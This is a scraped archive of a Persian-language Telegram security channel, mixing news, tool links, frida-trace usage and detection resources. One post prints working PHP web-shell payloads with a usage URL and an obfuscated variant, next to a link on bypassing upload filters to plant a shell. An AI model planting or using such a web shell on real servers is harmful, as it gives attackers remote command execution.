Network Security Channel

Open in Telegram

⭕️Start Channel From 2017⭕️ ✅ Security Operation Center (SOC) ✅ Bug Bounty ✅ Vulnerability ✅ Pentest ✅ Hardening ✅ Linux ✅ Reasearch ✅ Security Network ✅ Security Researcher ✅ DevSecOps ✅ Blue Team ✅ Red Team

Iran63 374 Technologies & Applications26 444

2 799

Subscribers

+1124 hours

+217 days

+6230 days

441

Post views

~ 19824 hours

~ 24048 hours

15.74%

Engagement rate

No data

Posts per day

Ads index

beta

Posts Archive

2 800

ویدئوی روز ۵ دقیقه https://www.youtube.com/watch?v=Rx4XUq8kJ2k @Engineer_Computer

2 800

فایروال pfsense رو به روز نگه دارید https://thehackernews.com/2023/12/new-security-vulnerabilities-uncovered.html @Engineer_Computer

2 800

👻 دیپ فیک مستقیماً از وب کم شما. #هوش_مصنوعی بدون نیاز به دانلود مدل به طور مستقیم در مرورگر اجرا می شود. 🌐 https://www.fal.ai/camera @Engineer_Computer

2 800

Roadmap to Become Web3 Developer : 📂 Learn HTML ∟📂 Learn CSS ∟📂 Learn JavaScript ∟📂 Learn React ∟📂 Learn Solidity ∟📂 Learn Ether.js ∟📂 Learn L2 ∟📂 Build Projects ∟ ✅ Start Applying for Job’s @Engineer_Computer

2 800

🔍 درایورها بخشی جدایی ناپذیر از عملکرد رایانه هستند و آسیب پذیری آنها یا استفاده از درایورهای مخرب می توانند خطرات امنیتی قابل توجهی ایجاد کنند. ⭕️ نظارت بر درایورها شما را قادر می سازد تا تهدیدات احتمالی را زود تشخیص داده و به شما این امکان را می دهد که اقدامات سریعی برای رفع آسیب پذیری ها، حذف درایورهای مخرب و به حداقل رساندن خطر سوء استفاده انجام دهید. 🔬 با استفاده از ابزارهای LolDriverScan یا loldrivers-client که با زبان گولنگ توسعه یافته است میتوانید درایورهای آسیب پذیر را در سیستم خود کشف کنید. این ابزارها لیست درایورهای مخرب را از loldrivers.io گرفته و سیستم را برای هر گونه درایور آسیب پذیر اسکن می کند. 🔬 اسکنرها 🔬 https://github.com/FourCoreLabs/loldriverscan 🔬 https://github.com/rtfmkiesel/loldrivers-client 🛟 پروژه هش لیست درایور های مخرب شناسایی شده 🛟 https://www.loldrivers.io 🛠 سیگما رول جهت شناسایی هش درایور های لود شده و ایجاد هشدار SOC 🛠 https://github.com/magicsword-io/LOLDrivers/blob/main/detections/sigma/driver_load_win_vuln_drivers.yml @Engineer_Computer

2 800

⭕️چگونگی استفاده از frida-trace برای تحلیل داینامیک اپ های اندرویدی در Termux:

توجه: نصب بودن ابزار frida-tools و انتقال فایل فریدا سرور به دایرکتوری زیر الزامی میباشد /data/local/tmp پس از انتقال فایل دسترسی 777 داده و ران کنید.

برای تریس کردن ورودی و خروجی متد های موجود در classes.dex توسط روش های زیر قابل انجام میباشد: توسط پروسس نیم برنامه:

frida-trace -R -J 'path/to/class!methodName' ProcessName

تریس به صورت auto spawn:

frida-trace -R -J 'path/to/class!methodName' -f com.package.name

تریس برنامه توسط pid برنامه:

frida-trace -R -j 'path/to/class!methodName' -p pid

--------------------------------------------------------- برای تریس کردن لایبرری و فانکشن های داخل آن: تریس به صورت auto spawn:

frida-trace -R -I 'libname.so' -i 'MethodName' -f com.package.name

توسط پروسس نیم برنامه:

frida-trace -R -I 'libname.so' -i 'MethodName' ProcessName

تریس برنامه توسط pid برنامه:

frida-trace -R -I 'libname.so' -i 'MethodName' -p pid

@Engineer_Computer

2 800

⭕️ محققان دانشگاه Vrije در آمستردام هلند یک حمله Side-Channel جدید به نام SLAM را کشف کرده‌اند که می‌تواند برای نشت اطلاعات حساس از حافظه کرنل در CPU های فعلی و آینده ی ‏ Intel , AMD و ARM مورد سوء استفاده قرار گیرد. این حمله یک اکسپلویت از سری حملات Spectre است که بر اساس یک ویژگی جدید در CPU های Intel به نام Linear Address Making (LAM) و همچنین مشابه آن از AMD (به نام Upper Address Ignore یا UAI) و Arm (به نام Top Byte Ignore) است. یا TBI) نیز نامگذاری شده است. محققان گفتند SLAM به ما اجازه می دهد تا داده‌های کرنل ASCII دلخواه را به بیرون بکشیم و می‌توان از آن برای افشای Hash رمز عبور Root در عرض چند دقیقه از حافظه کرنل استفاده کرد. این در حالی است که LAM به عنوان یک ویژگی امنیتی ارائه می شود، این مطالعه نشان داده که امنیت را کاهش می دهد و به طور چشمگیری سطح حمله Spectre را افزایش می دهد که منجر به این حمله میشود که از اجرای حدس و گمان برای استخراج داده های حساس از طریق یک Cache Covert Channel سوء استفاده می کند. ‏Intel در مستندات خود می گوید این حمله از اثرات جانبی ریزمعماری دستورالعمل های گذرا سوء است @Engineer_Computer

2 800

یه رایتاپ نچندان فنی ولی جذاب برای مایندست یه هانتر: https://nmochea.medium.com/a-million-journey-f02df23a2ae7 @Engineer_Computer

2 800

مقاله مهم تطابق سنسور ها و جدول ATT&CK https://medium.com/mitre-engenuity/understanding-the-connection-cybersecurity-events-and-mitre-att-ck-58e977c9fd5a @Engineer_Computer

2 800

دستورات Volatility برای تحلیل بد افزار در حافظه @Engineer_Computer

2 800

تست نفوذ فیزیکی نقش خدمتکاران سازمان در حوزه امنیت فیزیکی و امنیت اطلاعات https://covertaccessteam.substack.com/p/the-overlooked-key-exploiting-cleaning @Engineer_Computer

2 800

رمز نگاری منحنی و بیضوی | Elliptic Curve Cryptography مترجم: میلاد سقایت دانلود از سایت academia: کلیک کنید @Engineer_Computer

2 800

#FortiOs #hardening @Engineer_Computer

2 800

🗒 ChatGPT for Cybersecurity -|Part 4 قسمت چهارم مقاله ی چت جی پی تی @Engineer_Computer

2 800

🗒 I Hacked Another File Upload Website

https://www.youtube.com/watch?v=BJhTZlg5Ig8

بایپس آپلودر و آپلود شل @Engineer_Computer

2 800

🗒 mini PHP Payload * <?=$_GET[0]?> <?=$_POST[0]?> <?={$_REQUEST['_']}?> * Usage :

Target.com/path/to/shell.php?0=command

* Obfuscation :

<?=$_="";$_="'";$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1))).($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));$_=${$_}['_'^'o'];echo

`$_`?> @Engineer_Computer

2 800

هکر ها چطور در لینوکس دسترسی خود را ماندگار می‌کنند @Engineer_Computer

2 800

تناقضاتی در درفت استاندارد جدید NIST NIST 800-171 R3 Ghost Controls https://www.linkedin.com/pulse/nist-800-171-r3-ghost-controls-complianceforge-hhbwc?utm_source=share&utm_medium=member_android&utm_campaign=share_via @Engineer_Computer

2 800

با استفاده از Wazuh پورتهای USB را پایش کنید https://wazuh.com/blog/monitoring-usb-drives-in-linux-using-wazuh/ @Engineer_Computer

2 800

مرور کشف C2 از روی کدهای DNS https://www.socinvestigation.com/how-to-detect-malware-c2-with-dns-status-codes/ @Engineer_Computer